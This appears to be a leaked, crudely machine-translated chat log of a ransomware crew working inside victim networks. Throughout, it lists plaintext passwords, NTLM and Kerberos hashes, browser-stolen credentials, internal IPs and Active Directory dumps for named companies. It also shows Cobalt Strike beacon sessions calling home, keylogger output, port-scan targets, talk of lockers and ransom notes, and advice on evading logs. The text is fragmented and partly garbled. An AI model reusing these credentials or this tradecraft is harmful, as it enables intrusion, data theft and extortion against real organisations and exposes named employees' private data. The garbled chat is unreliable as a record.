`olkexplorer.officeUI.dll` - I'll call it `7 out.7z file.txt file2.txt file3.txt` thank you` 7z ?))See you all tomorrow, thank you all))restart the clientbut it[ ](https://mediaeveryone.com/channel/general?msg=ZF8QdG6YHpW3E5Q5h) that is hanging? More precisely teem server, probably hangs after lunch give more sessions@user1 once said that you need time to put the records on modules and vectors in order, before lunch can do this yesThe second command helps first from emeralmatherials.com?
Our sessions:hiDo they? 2 with the other2 with one teamaWe're 4 here with the second team yet?Good morning to allGood morningGood morningGood morningGreetings)See you soon) Well, on the 5th at 2 in the office) Thank you)) When all said)) Happy New Year)) Thank you) Likewise, and thanks for bearing all our zatupy, with the New Year, all the best and also more bonuses) Thanks) Also happy to work with you @tl2 and the guys in the office, very much from you learned. It was a hard year from all points of view, we went through all sorts of things with you and you have grown a lot since our first meeting, which I am very glad. Especially during the last month you have been working as close as possible and as a team. I am glad we are working together, I hope you will not lose this spirit in the new year. Congratulations to all of you on a happy new year! I wish you happiness, more bonuses, health and a good sleep for the weekend. Thank you all)Very fast and can go away)I will sum up the year in 2 hours)
https://wwhq62nas.us2.quickconnect.to/
https://waterway63.us2.quickconnect.to/
```
```
Waterway
11915Wnas2179!
``What time?'' Well it's also seen in GeneralWe're coming back on the 5th of the dayI @tl2 said that you came of your own accordThank you all for coming today
WATERWAY\Quser pdiC1137qu!
WATERWAY\Administrator 1853Gators
WATERWAY\datavault Waterway727
WATERWAY\domainrestore Waterway727
WATERWAY\mapusatera Gators1853
WATERWAY\veeam_admin 99Waterway
WATERWAY\Applied Waterway99
WATERWAY\DBunte Waterway99
WATERWAY\gkeller Waterway76
WATERWAY\SEnglert Waterway99!
waterway\ssuser pdiC1137ssrs!
WATERWAY\Fpuser pdiC1137fp!
WATERWAY\U05 05Blues
```
```
us:
192.168.0.3
Waterway
11915Wnas2179!
````WATERWAY\blauer 11915Admin2179!
User: mapusatera - IP Address: 192.168.0.164
User: DBunte - IP Address: 192.168.90.2
User: gkeller - IP Address: 192.168.0.162
User: Quser - IP Address: 192.168.13.57
LEVASHENKO-PC: 192.168.0.22 mharper
WWSQL: 192.168.0.188 blauer
LAB-OFFICE: 192.168.0.161 Administrator
``and on this all-logins and passwords give separate information about tachka adminsladno so my versionda, i think the new version of ff changed the algorithm as i remember he did not give anything other than mosilla sharpweb kazhiz not workada sharpweb also pusilimozila they have noff separately goes edg new and chomon itself checks only browsers on the chrome engine sharpchromium all browsers you kste looked only chrome?but after the signal head-on that we're back more likely soon to redo everything they probably rolled back and scored their passwords 2-3 duplicates per YES) and as for passwords I would check their mail for starters as a variant daobvezti them keyloggers, or what ...paper to steal they go there through the network anywaywhy? well, we'll have to go to them then, hulino traces in any case is thereavlya not on the network accesses may be on the paper also if you think sohttp://infosight.hpe.com/InfoSight/media/cms/active/public/pubs_GUI_Administration_Guide_NOS_50x.whz/unm1501525250368.htmlBy the way, they had folders restore - like from programs to restore deleted files. it's just a word that the accesses to the crash site will be fresh and they rolled back quickly after the first one and the grid goes on the second circle just to think about it after such a clear sign that the fight is not over they probably understand if the grid goes on the second circleHueeeeeeeew))) he probably decided to work from home, bastard)and like now burned him Sharphromium removed passwords, removed logopassword, in chrome handheld browsed the history. did you look for traces of nimble? did you read his mail?) the answer was no. did you check if he was using nimblebrowser or if he had a ms outlook client?I turned on the rdp on it, is there a car? did not find access to the mail have not looked? there is another option, on the synolodji put passwords blauer, perhaps on the nimbles, too, he too. and the logs that is backed up there, how many admins from nimbla group have you been? there only correspondence with the seller and the correspondence on the setting (dock, I've already thrown) there's also a maximum I followed @user7 found information from the pdf checked for these tags and nimbla looked for and saw the hostnamenimble) I was at the post of a few dudes, there on the subject
veeam, backup, pass, sphere, center nothing
I searched the mail with a few dudes about veeam, backup, pass, sphere, center blank. at most on the backup came out that i screenshot, about data stolen network hacked, and allThey probably all it department domain admins - not to get up twice)) and maybe in correspondence lit up something interesting he gets here `` ``
>displayName: Greg Keller
>uSNCreated: 17303
>memberOf: CN=Veeam Admins,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com
>memberOf: CN=IT,OU=WW2K Security,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com
>memberOf: CN=Nimble Admins,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com
>memberOf: CN=ITStaff,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com
>memberOf: CN=Office,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com
>memberOf: CN=OfficeSQL,OU=SQLGroups,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com
>memberOf: CN=OnlyOffice,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com
>memberOf: CN=Domain Admins,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com
but since he's a developer they have an internal portal, maybe you should still look there no keller is a developer. they have blauer not removed his access from the outlook? gkeller is 60% sure that this guy has access to the mail there so what's wrong with us with us
WATERWAY\U05
05Blues
``[ ](https://mediaeveryone.com/group/waterway-com?msg=DhHDNhcrjFT5CcYtP) where did you get this? ``05Blues``031bac9c9ef2cfcc9b630ab7fae8c0ed as well as the rootlintam still has an alert for temperature``
Message: Temperature sensor bp-temp1 on shelf AF-180176 at left-side backplane is 33 Celsius. Check air temperature and air flow around the array.
````https://wwhq62nas.us2.quickconnect.to/ ``the rdp port is open the rest is nottpio writes login was from this ipai ask what the rdp know) ``ww-nimble-01 `` is the nibble which is 192.168.0.75 what do we have here?
127.0.1.2:3389
``````
Time: Wed Oct 7 10:58:43 2020
Type: 14806
ID: 13472
Message: Root login to controller A from 127.0.1.2 succeeded.
Group Name: Group1
Array name: ww-nimble-01
Serial: AF-180176
Version: 4.5.2.0-553085-opt
Arrays in the group:
---------------------+-----------------+-----------+----------------
Name Serial Model Version
---------------------+-----------------+-----------+----------------
ww-nimble-01 AF-180176 CS1000 4.5.2.0-553085-opt
CONFIDENTIALITY NOTICE: The materials enclosed with this email transmission are private and confidential. The information contained in the material is privileged and is intended only for the use of the individual(s) or entity(ies) named above. If you are not the intended recipient, be advised that unauthorized use, disclosure, copying, distribution or the taking of any action in reliance on the contents of this emailed information is strictly prohibited. If you have received this email transmission in error, please notify the sender immediately by return email, delete this communication and destroy all copies.
``cloudy?``https://192.168.63.30:5001/`` - same us` ``https://waterway63.us2.quickconnect.to/` - 1 more us``1Vanilla2` give password 096d6208ddf94d8e3fcf87e3e1aa1ebf``
192.168.0.3
Waterway
11915Wnas2179!
``````
--- Chromium Credential (User: blauer) ---
URL :
Username : waterwayapps@gmail.com
Password : 2Vanilla1
--- Chromium Credential (User: blauer) ---
URL : https://auth.vantiv.com/openam/UI/Login
Username : blauer@waterway.com
Password : 11915Iq2179!
--- Chromium Credential (User: blauer) ---
URL :
Username : blauer@waterway.com
Password : 11915Gi2179!
--- Chromium Credential (User: blauer) ---
URL : https://www.serversupply.com/process_order4.asp
Username : blauer@waterway.com
Password : 11915Ss2179
``````
LEVASHENKO-PC: 192.168.0.22 mharper
WWSQL: 192.168.0.188 blauer
LAB-OFFICE: 192.168.0.161 administrator
``No luck? and mail the hostname ``ww-nimble-01``1Vanilla2 ``but there is a client installed check the installed software else``
WATERWAY\gkeller Waterway76
``````
192.168.0.162:3389
if the service is off do you turn it on? if the service is on do you turn it off do you turn it on why do you say the rdp does not let techies in?
21 ftp
22,23 ssh, telnet
80,443 http, https
5900 VNC
3389 Microsoft Terminal Server (rdp)
5631,5632 pcAnywhere
445,1433 MS-SQL Server
3306 MySQL
1521,2483 Oracle
5432 PostgreSQL
5938 nbvdm.th
7199 JMX monitoring port
7000 inter-node cluster
7001 SSL inter-node cluster
9042 CQL Native Transport Port
9160 Thrift DataStax OpsCenter
61620 opscenterd daemon
61621 Agent
8888 Website
1-30,80,443,5900,3389,5631,5632,445,1433,3306,1521,2483,5432,5938,7199,7000,7001,9042,9160,61620,8888,61621
``By the way, here's an addition to the port
0.1:5432") shows that PostgreSQL is listening only for connections originating from the local computer, so we will have to edit the
My mistake.
pcAnywhere was a suite of computer programs by Symantec which allows a user of the pcAnywhere remote program on a computer to connect to a personal computer running the pcAnywhere host if both are connected to interconnected networks and the password is known
``````
PCAnywhere uses ports 5631 (Data port or Transmission Control Protocol [TCP]) and 5632 (Status port or User Datagram Protocol [UDP]) to communicate
``you know what this is?)``192.168.0.75:5432````
192.168.0.75:5432
192.168.0.75:443
192.168.0.75:80
[+] received output:
192.168.0.75:22 (SSH-2.0-OpenSSH_7.4)
Scanner module is complete
``Please pay attention to 2http/chttp what scheme are you connecting to?
https://192.168.0.42
https://192.168.0.43
https://192.168.0.75
https://192.168.0.77
``what ip?'' No rdp on nimblenet too
User: gkeller - IP Address: 192.168.0.162
``No rdp[ ](https://mediaeveryone.com/group/waterway-com?msg=FBXc3Z2B6XvwaGuKW) here, what's the IP?
WATERWAY\mapusatera Gators1853
``````
CurrentUser : WATERWAY\mapusatera
Idletime : 01h:54m:23s:531ms (352463531 milliseconds)
``172.17.112.1 as I understand the pdf says that they are from the AD check only idletimevariant good and from there to chekatmb to them on RDP go to the thing about the Guy nimbala I have on all tacts several IP inputs as I understand + you on the same ip go?[I have a few different ways to get to him, but I don't know how to get to him.
gkeller 134cee9671bb94bffdaefb6f84f5989d
Now that's interesting.
dn:CN=Nimble Admins,OU=SecurtyGroups,OU=Corporate,DC=waterway,DC=com
>objectClass: top
>objectClass: group
>cn: Nimble Admins
>member: CN=Brandon Lauer,CN=Users,DC=waterway,DC=com
>member: CN=Dianne Jarden,OU=OfficeUsers,OU=Corporate,DC=waterway,DC=com
>member: CN=appliedgroup,OU=Special Users,OU=Corporate,DC=waterway,DC=com
>member: CN=Greg Keller,OU=OfficeUsers,OU=Corporate,DC=waterway,DC=com
>member: CN=Mark Harper,OU=OfficeUsers,OU=Corporate,DC=waterway,DC=com
>member: CN=Mike Pusatera,OU=OfficeUsers,OU=Corporate,DC=waterway,DC=com
>member: CN=Administrator,OU=Special Users,OU=Corporate,DC=waterway,DC=com
```
```
blauer
djarden
gkeller waterway76
mharper
mapusatera Gators1853
Administrator 1853Gators
the same with ssx similarly doyten you do not go through rdp via proxy any manipulations with the network are done through a dedik as rdp ssx skl web and so on you still dedik for that, do you connect to the network through ssx proxy?) to sum it up: use vince for testing ssx accesses with vince also happens, but rarely. in more serious systems on the same level as the current date of connection will hang an error that there was a failed attempt to enter on such and such a day from such and such a path during authorization successful afterwards just if through ssh directly fixed message in the log getsthere is already experience)do not knowhough here, about whether a failed password gets into the log during copying via sabinet - here I will not argue))) I know, constantly use. Not winSCP though, but the usual linux one. but underneath both Ibsch is not pure ssh
WinSCP supports five transfer protocols: SFTP (SSH File Transfer Protocol); FTP (File Transfer Protocol); SCP (Secure Copy Protocol);
Can sshp help? It's the same ssh under the hood, but proxies don't help.
a) you can fuck up your password at least, and this message about failed logon the next time you log on to SCP
b) the alerts to your email
c) Login by proxy proxy proxy so we are through proxy. and I have not heard about vincezp...for the simple reason that if you catch a wrong password you will not leave a passchalk in the form of logs at the login accesses are tested ONLY WITHIN vincezp do not forget```
WATERWAY\Applied Waterway99
``````
local-user admin class manage
password hash
$h$6$yUYGy+aaZlXJHmJn$E6qtQR7QVSx4y2M5eR2N3o6luDGdCZ5iXdLn1a5qGEO/pXQo7Qo2tynxcjVzbNiH2IsvDgEKeye
H2W6DyHkJDA==
service-type telnet http https terminal
authorization-attribute user-role network-admin
authorization-attribute user-role network-operator
#
local-user applied class manage
password hash
$h$6$hKewp2sE1Ks4S7TF$/ymqDpm46U4XCP9njU4FMbDOxm9Gwnk0oC7ScVyhFSwKIn7M42+gfjHGOBIVAtfM1J5tvL3U
xKW4isDfXhCjpw==
``What do you know now about the usefulness of the mail) at the post office admins - where? there is a doc with the settings on the mail screenshot? 22roottakoy and only such and only such ashhostnamevbibee ip on the request backup issued takoene then read))) and procheck passwords through mail can transfer keys if we nimbly get in, what's the point of mail?why should mail have priority or look for a separate tool on git[ ](https://mediaeveryone.com/group/waterway-com?msg=FqeuTwcmZRLrWvD5L) why should mail have priority?
URL : https://mail.datotel.com/
Username : jboden@waterway.com
Password : Moose1234!
``nimbles has ssh, but it's keyed. what can i do to get the creds off putty? user9https://www.stellarinfo.com/article/export-exchange-2010-mailbox-to-pst.php``
Username : Administrator
Domain : ALLOY
Password : j@mez9olk
``Trying to log in to the ehas under dudes that have ``ou=Exchange Administrative Group`` with mailsniper, rumor has it that it doesn`t work[ ](https://mediaeveryone.com/group/rtpcompany-com?msg=aw69Bm6w9zALkpsCB) went to the exh server, opened the exh shell, it fell out with this oneilsniper?
WARNING: No Exchange servers are available in the Active Directory site Suzhou. Connecting to an Exchange server in
another Active Directory site.
WARNING: No Exchange servers are available in the Active Directory site France. Connecting to an Exchange server in
another Active Directory site.
WARNING: No Exchange servers are available in the Active Directory site Indy. Connecting to an Exchange server in
another Active Directory site.
WARNING: No Exchange servers are available in the Active Directory site Orange. Connecting to an Exchange server in
another Active Directory site.
WARNING: No Exchange servers are available in the Active Directory site VA. Connecting to an Exchange server in another
Active Directory site.
WARNING: No Exchange servers are available in the Active Directory site Singapore. Connecting to an Exchange server in
another Active Directory site.
WARNING: No Exchange servers are available in the Active Directory site Crocket. Connecting to an Exchange server in
another Active Directory site.
WARNING: No Exchange servers are available in the Active Directory site Mexico. Connecting to an Exchange server in
another Active Directory site.
WARNING: No Exchange servers are available in the Active Directory site Germany. Connecting to an Exchange server in
another Active Directory site.
WARNING: No Exchange servers are available in the Active Directory site Ohio. Connecting to an Exchange server in
another Active Directory site.
WARNING: No Exchange servers are available in the Active Directory site WI. Connecting to an Exchange server in another
Active Directory site.
WARNING: No Exchange servers are available in the Active Directory site Henderson. Connecting to an Exchange server in
another Active Directory site.
WARNING: No Exchange servers are available in the Active Directory site Nevada. Connecting to an Exchange server in
another Active Directory site.
WARNING: No Exchange servers are available in the Active Directory site Poland. Connecting to an Exchange server in
Another Active Directory site.
WARNING: No Exchange servers are available in the Active Directory site Suzhou. Connecting to an Exchange server in
WARNING: Connecting to an Exchange server in another Active Directory site.
VERBOSE: Connecting to Exchange.rtpco.local.
``````
Username : arobinsona
Domain : RTPCO
Password : Passw0rd!
Username : O365Service
Domain : RTPCO
Password : Password1!
``If we've done what we can do, why wait for him to write ``.
Trend breaks the locker, not the note, but now it also breaks the tht, that's why it doesn't leave a note
it's better to wait for mana
``I'm not sure if it's all encrypted there, so unscramble it and fuck with their heads.)
Or make a file with a different name and content slightly tampered with.What about the note if the locker worked ok? mostly kerbs no attention or 1-2 networks maxrode nigdea tell me where the NTDS dumped there ``
bigassfans.com fishusa.com healthcare.com mgrmedu.com telecomlabsinc.com
bnpmedia.com forestriverinc.com holzerford.com netease.com unf.edu
cpcc.edu globaltranz.com humboldt.edu oasispetroleum.com vpinc.net
desire2learn.com gpj.com mapciasp.com orenco.com zohocorp
epcusa.com happay.in matchesfashion.com snpartners.com
I can't find my build on my hardcodile triad just psh doesn't work) there's a guy who "rules" it out there
and please give me a .net shairfinder will you take it? i'll brougt the vpnotscan sabiki find adr? ok i'll give all vpnos to work for it already
there's one on backdoor
triadmetals
alloypolimers
ballymoregroup
how much? they said you have the grids? tomorrow's boot? yes please clean out the dead sessions there yes? no need, i already ordered it, i just want to test it today on some and this one will do fine1 i can give you a fresh one i ordered 3 for the boot i can give you the old one, it's the one wilson lochy
you ordered a new one for you already the old one? cause the old one) i thought you flooded it aaa ok give it to @user4 i can work on it? you do not use this server? 104.194.10.161ARCHIVE.loomisco.com yes, extended, please```
loomisco.com\EDIADMIN:APPSYS
loomisco.comShutdown:p3bk@c1
loomisco.com/Omiller:Angela327!
``I'll write a full report with commands or only the steps? Immediately report as found@tl1 @tl2Keach such error reduces the number of remaining authorization attempts before the account is blocked.
ERROR: Logon failure: unknown user name or bad password.
``````
beacon> net share
[*] Tasked beacon to run net share on localhost
[+] host called home, sent: 104505 bytes
[+] received output:
Shares at \localhost:
Share name Comment
---------- -------
ADMIN$ Remote Admin
C$ Default share
F$ Default share
IPC$ Remote IPC
Scan_Data
``````
beacon> net logons
[*] Tasked beacon to run net logons on localhost
[+] host called home, sent: 104506 bytes
[+] received output:
Logged on users at \localhost:
[+] received output:
Loomisco\Backupuser
SCANSTORAGE\Backupuser
Loomisco\Backupuser
LOOMIS\SCANSTORAGE$
``loomisco.com
beacon> net domain
[*] Tasked beacon to run net domain
[+] host called home, sent: 257 bytes
[+] received output:
loomisco.com
``````
Administrator:500:aad3b435b51404eeaad3b435b51404ee:78fe7f8e8140a38ea3886cccd4cb0a19:::p3bk@c1
````Loomisco\Backupuser ASdnmxcsdf@#d````
Administrator:500:aad3b435b51404eeaad3b435b51404ee:78fe7f8e8140a38ea3886cccd4cb0a19:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SophosSAUSCANSTORaaa:1005:aad3b435b51404eeaad3b435b51404ee:546026a5bc5721ea345185056d7e21c1:::
``````
beacon> net domain_controllers
[*] Tasked beacon to run net domain_controllers
[+] host called home, sent: 104518 bytes
[+] received output:
Domain Controllers:
Server Name IP Address
----------- ----------
TLCDC1 192.168.0.192
TLCDC2 192.168.0.222
``user9files won't fly (sextg@tl1``)
CORP\jvelazquezg 956e44f5069e8f0161ea7064840894ff
CORP\Rflores 3e33c0155d517e77ad1a4040c9ed4e45
CORP\lvegar 06ca20732bea98870c93d29a2b31e783
FILIAL\Anavarretea 5cb20c880326791e424fc9f2554ae9b4
CORP\evazquezpr 288c03a4543cf46d0a665df89f1b8a3d
```
I managed to get the hashes down.
Teemo[SFE18491]Hgutierreze/792560|2021Jan28 20:51:16> shell tasklist /v /s CORPKIOVDAPGM01.corp.televisa.com.mx
[*] tasked beacon to run: tasklist /v /s CORPKIOVDAPGM01.corp.televisa.com.mx
[+] host called home, sent: 82 bytes
Nombre de imagen PID Nombre de sesión Núm. de ses Uso de memor Nombre de usuario Tiempo de CP
========================= ======== ================ =========== ============ ================================================== ============
System Idle Process 0 Services 0 4 KB NT AUTHORITY\SYSTEM 1600:47:50
System 4 Services 0 256 KB N/D 3:39:06
smss.exe 1340 Services 0 1,052 KB NT AUTHORITY\SYSTEM 0:00:01
csrss.exe 1452 Services 0 4,724 KB NT AUTHORITY\SYSTEM 0:00:42
wininit.exe 1524 Services 0 4,152 KB NT AUTHORITY\SYSTEM 0:00:00
services.exe 1616 Services 0 14,012 KB NT AUTHORITY\SYSTEM 0:02:46
lsass.exe 1660 Services 0 60,944 KB NT AUTHORITY\SYSTEM 0:27:11
svchost.exe 1752 Services 0 22,616 KB NT AUTHORITY\SYSTEM 0:06:03
svchost.exe 1784 Services 0 14,632 KB NT AUTHORITY\NETWORK SERVICE 0:03:50
svchost.exe 1900 Services 0 25,576 KB NT AUTHORITY\LOCAL SERVICE 3:10:52
svchost.exe 1916 Services 0 91,696 KB NT AUTHORITY\SYSTEM 2:50:25
svchost.exe 1940 Services 0 18,528 KB NT AUTHORITY\LOCAL SERVICE 0:01:21
Citrix.Wem.Agent.Service. 1996 Services 0 135,548 KB NT AUTHORITY\SYSTEM 0:12:47
svchost.exe 1412 Services 0 73,540 KB NT AUTHORITY\SYSTEM 3:24:01
Citrix.Wem.Agent.LogonSer 1188 Services 0 26,320 KB NT AUTHORITY\SYSTEM 0:00:02
svchost.exe 1608 Services 0 23,080 KB NT AUTHORITY\NETWORK SERVICE 0:10:18
CtxPvDSvc.exe 1180 Services 0 7,976 KB NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 1404 Services 0 28,256 KB NT AUTHORITY\SYSTEM 0:00:34
UserProfileManager.exe 2068 Services 0 15,532 KB NT AUTHORITY\SYSTEM 0:05:52
svchost.exe 2184 Services 0 9,100 KB NT AUTHORITY\LOCAL SERVICE 0:00:05
svchost.exe 2236 Services 0 16,064 KB NT AUTHORITY\LOCAL SERVICE 0:00:21
PvsVmAgent.exe 2268 Services 0 6,068 KB NT AUTHORITY\SYSTEM 0:00:00
BNDevice.exe 2388 Services 0 11,816 KB NT AUTHORITY\SYSTEM 0:00:00
spoolsv.exe 2544 Services 0 77,740 KB NT AUTHORITY\SYSTEM 0:39:24
armsvc.exe 2584 Services 0 6,768 KB NT AUTHORITY\SYSTEM 0:00:00
BrokerAgent.exe 2712 Services 0 136,640 KB NT AUTHORITY\NETWORK SERVICE 0:15:24
CdfSvc.exe 2820 Services 0 7,636 KB NT AUTHORITY\NETWORK SERVICE 0:00:00
encsvc.exe 2860 Services 0 6,972 KB NT AUTHORITY\LOCAL SERVICE 0:39:29
CseEngine.exe 2948 Services 0 1,081,368 KB NT AUTHORITY\SYSTEM 4:51:34
ctxrdr.exe 3004 Services 0 7,360 KB NT AUTHORITY\LOCAL SERVICE 0:00:00
CtxCeipSvc.exe 2064 Services 0 8,804 KB NT AUTHORITY\LOCAL SERVICE 0:00:00
CpSvc.exe 2156 Services 0 35,064 KB NT AUTHORITY\LOCAL SERVICE 0:17:06
CtxAppVService.exe 2464 Services 0 45,288 KB NT AUTHORITY\SYSTEM 0:00:00
CtxSvcHost.exe 2428 Services 0 9,856 KB NT AUTHORITY\LOCAL SERVICE 0:00:04
CtxSvcHost.exe 2684 Services 0 8,204 KB NT AUTHORITY\LOCAL SERVICE 0:00:00
WebSocketService.exe 532 Services 0 9,924 KB NT AUTHORITY\SYSTEM 0:00:01
CtxSvcHost.exe 1016 Services 0 8,096 KB NT AUTHORITY\LOCAL SERVICE 0:00:01
CtxSvcHost.exe 912 Services 0 7,536 KB NT AUTHORITY\LOCAL SERVICE 0:00:00
CtxSvcHost.exe 392 Services 0 12,740 KB NT AUTHORITY\LOCAL SERVICE 0:00:42
macmnsvc.exe 988 Services 0 12,816 KB NT AUTHORITY\LOCAL SERVICE 0:00:13
masvc.exe 1128 Services 0 28,904 KB NT AUTHORITY\LOCAL SERVICE 0:03:42
CtxSvcHost.exe 2764 Services 0 7,372 KB NT AUTHORITY\LOCAL SERVICE 0:00:00
SCService64.exe 2656 Services 0 23,728 KB NT AUTHORITY\NETWORK SERVICE 0:00:17
svchost.exe 2516 Services 0 40,968 KB NT AUTHORITY\NETWORK SERVICE 0:48:48
SemsService.exe 2872 Services 0 39,660 KB NT AUTHORITY\LOCAL SERVICE 0:02:54
ImaAdvanceSrv64.exe 3192 Services 0 8,708 KB NT AUTHORITY\SYSTEM 0:00:18
macompatsvc.exe 3968 Services 0 15,224 KB NT AUTHORITY\SYSTEM 0:00:12
mfemactl.exe 3164 Services 0 8,196 KB NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 2844 Services 0 11,260 KB NT AUTHORITY\SYSTEM 0:01:11
svchost.exe 4108 Services 0 7,728 KB NT AUTHORITY\NETWORK SERVICE 0:00:02
TelemetryService.exe 3092 Services 0 69,936 KB NT SERVICE\CitrixTelemetryService 0:00:08
AotListener.exe 2040 Services 0 25,312 KB NT SERVICE\CitrixTelemetryService 0:00:00
conhost.exe 4584 Services 0 6,008 KB NT SERVICE\CitrixTelemetryService 0:00:00
VSSVC.exe 3892 Services 0 9,224 KB NT AUTHORITY\SYSTEM 0:00:00
msdtc.exe 3720 Services 0 9,652 KB NT AUTHORITY\NETWORK SERVICE 0:00:00
svchost.exe 2932 Services 0 6,780 KB NT AUTHORITY\LOCAL SERVICE 0:00:00
mctelsvc.exe 428 Services 0 15,404 KB NT AUTHORITY\SYSTEM 0:00:03
CloudamizeWatchdog.exe 4036 Services 0 44,692 KB NT AUTHORITY\SYSTEM 0:01:43
csrss.exe 4132 Console 2 3,928 KB NT AUTHORITY\SYSTEM 0:00:00
winlogon.exe 2172 Console 2 10,192 KB NT AUTHORITY\SYSTEM 0:00:00
logonUI.exe 2452 Console 2 28,604 KB NT AUTHORITY\SYSTEM 0:00:00
dwm.exe 3076 Console 2 27,300 KB Window Manager\DWM-2 0:00:00
WmiPrvSE.exe 13236 Services 0 36,596 KB NT AUTHORITY\SYSTEM 0:58:13
WmiPrvSE.exe 1288 Services 0 24,688 KB NT AUTHORITY\LOCAL SERVICE 0:01:42
WmiPrvSE.exe 11844 Services 0 12,904 KB NT AUTHORITY\NETWORK SERVICE 0:02:52
csrss.exe 10104 ICA-CGP#13 108 12,360 KB NT AUTHORITY\SYSTEM 0:00:00
winlogon.exe 12108 ICA-CGP#13 108 13,176 KB NT AUTHORITY\SYSTEM 0:00:06
dwm.exe 11816 ICA-CGP#13 108 38,720 KB Window Manager\DWM-108 0:00:01
ctxgfx.exe 8400 ICA-CGP#13 108 26,860 KB NT AUTHORITY\SYSTEM 0:00:01
taskhostex.exe 10436 ICA-CGP#13 108 9,088 KB CORP\jvelazquezg 0:00:00
icak2meng.exe 12952 ICA-CGP#13 108 7,344 KB NT AUTHORITY\SYSTEM 0:00:00
wfshell.exe 9128 ICA-CGP#13 108 21,312 KB CORP\jvelazquezg 0:00:00
CtxMtHost.exe 8132 ICA-CGP#13 108 8,584 KB CORP\jvelazquezg 0:00:00
SptEddss.exe 4080 ICA-CGP#13 108 38,776 KB CORP\jvelazquezg 0:00:14
DirectorComServer.exe 12256 ICA-CGP#13 108 21,836 KB CORP\jvelazquezg 0:00:00
csrss.exe 10924 ICA-CGP#14 120 8,728 KB NT AUTHORITY\SYSTEM 0:00:03
winlogon.exe 12836 ICA-CGP#14 120 13,232 KB NT AUTHORITY\SYSTEM 0:00:01
dwm.exe 1860 ICA-CGP#14 120 37,976 KB Window Manager\DWM-120 0:00:02
ctxgfx.exe 9544 ICA-CGP#14 120 46,704 KB NT AUTHORITY\SYSTEM 0:00:06
icak2meng.exe 8960 ICA-CGP#14 120 7,344 KB NT AUTHORITY\SYSTEM 0:00:00
taskhostex.exe 2036 ICA-CGP#14 120 9,016 KB CORP\lvegar 0:00:00
wfshell.exe 13040 ICA-CGP#14 120 20,920 KB CORP\lvegar 0:00:00
DirectorComServer.exe 13264 ICA-CGP#14 120 21,900 KB CORP\lvegar 0:00:00
CtxMtHost.exe 9096 ICA-CGP#14 120 8,576 KB CORP\lvegar 0:00:00
PgmCtl32.exe 1720 ICA-CGP#14 120 71,376 KB CORP\lvegar 0:01:56
TitleMan.exe 12948 ICA-CGP#14 120 33,388 KB CORP\lvegar 0:00:01
WmiPrvSE.exe 11700 Services 0 13,344 KB NT AUTHORITY\NETWORK SERVICE 0:00:05
csrss.exe 580 ICA-CGP#113 77 8,312 KB NT AUTHORITY\SYSTEM 0:00:00
winlogon.exe 4428 ICA-CGP#113 77 13,208 KB NT AUTHORITY\SYSTEM 0:00:00
dwm.exe 3736 ICA-CGP#113 77 29,288 KB Window Manager\DWM-77 0:00:00
ctxgfx.exe 9272 ICA-CGP#113 77 26,384 KB NT AUTHORITY\SYSTEM 0:00:00
icak2meng.exe 12472 ICA-CGP#113 77 7,300 KB NT AUTHORITY\SYSTEM 0:00:00
wfshell.exe 12764 ICA-CGP#113 77 21,344 KB FILIAL\Anavarretea 0:00:00
CtxMtHost.exe 600 ICA-CGP#113 77 8,580 KB FILIAL\Anavarretea 0:00:00
Accounts.exe 3824 ICA-CGP#113 77 32,612 KB FILIAL\Anavarretea 0:00:13
taskhostex.exe 12336 ICA-CGP#113 77 8,968 KB FILIAL\Anavarretea 0:00:00
DirectorComServer.exe 6428 ICA-CGP#113 77 21,860 KB FILIAL\Anavarretea 0:00:00
csrss.exe 9464 ICA-CGP#115 38 8,640 KB NT AUTHORITY\SYSTEM 0:00:00
winlogon.exe 5088 ICA-CGP#115 38 13,196 KB NT AUTHORITY\SYSTEM 0:00:00
dwm.exe 9640 ICA-CGP#115 38 29,636 KB Window Manager\DWM-38 0:00:00
ctxgfx.exe 456 ICA-CGP#115 38 35,472 KB NT AUTHORITY\SYSTEM 0:00:00
icak2meng.exe 10760 ICA-CGP#115 38 7,332 KB NT AUTHORITY\SYSTEM 0:00:00
taskhostex.exe 9872 ICA-CGP#115 38 8,988 KB CORP\pbsilvalo 0:00:00
wfshell.exe 6504 ICA-CGP#115 38 20,820 KB CORP\pbsilvalo 0:00:00
CtxMtHost.exe 8168 ICA-CGP#115 38 8,588 KB CORP\pbsilvalo 0:00:00
PgmCtl32.exe 8600 ICA-CGP#115 38 66,664 KB CORP\pbsilvalo 0:00:10
DirectorComServer.exe 4588 ICA-CGP#115 38 21,900 KB CORP\pbsilvalo 0:00:00
TitleMan.exe 11740 ICA-CGP#115 38 33,332 KB CORP\pbsilvalo 0:00:01
SptEddss.exe 9260 ICA-CGP#13 108 35,328 KB CORP\jvelazquezg 0:00:05
rundll32.exe 7884 Services 0 11,312 KB NT AUTHORITY\SYSTEM 0:00:00
rundll32.exe 5968 Services 0 11,336 KB NT AUTHORITY\SYSTEM 0:00:00
powershell.exe 10816 Services 0 91,076 KB NT AUTHORITY\SYSTEM 0:00:01
conhost.exe 12992 Services 0 6,172 KB NT AUTHORITY\SYSTEM 0:00:00
powershell.exe 10928 Services 0 52,624 KB NT AUTHORITY\SYSTEM 0:00:00
conhost.exe 4548 Services 0 5,940 KB NT AUTHORITY\SYSTEM 0:00:00
```
something does not draw the car@user7 then work here ``
User : NT AUTHORITY\SYSTEM
Window : Conexión - Internet Explorer
Time : 2021-01-28 09:36:38 a. m.
LogFile : WireTap.log
----------------------------------------------
hgutie
[+] received output:
73HILArioge=
Just like a peep in the eye.
TrGUI
=======
R8WTksIOle1rP8)P
253758
```
vpn``.
202B fil 09/23/2020 16:25:07 pas.txt
903.2KB fil 09/21/2020 14:59:51 seatinfo.txt
```
and files left)I won't repeat any more where the hashtag format ```
[*] Tasked beacon to psinject: invoke-kerberoast | fl into 508 (x64)
[+] host called home, sent: 133723 bytes
[+] received output:
TicketByteHexStream :
Hash : $krb5tgs$host/STS.GPJ.COM:922009E476DEA5700F2E695715EB812D$BBDE017D99D5497CE
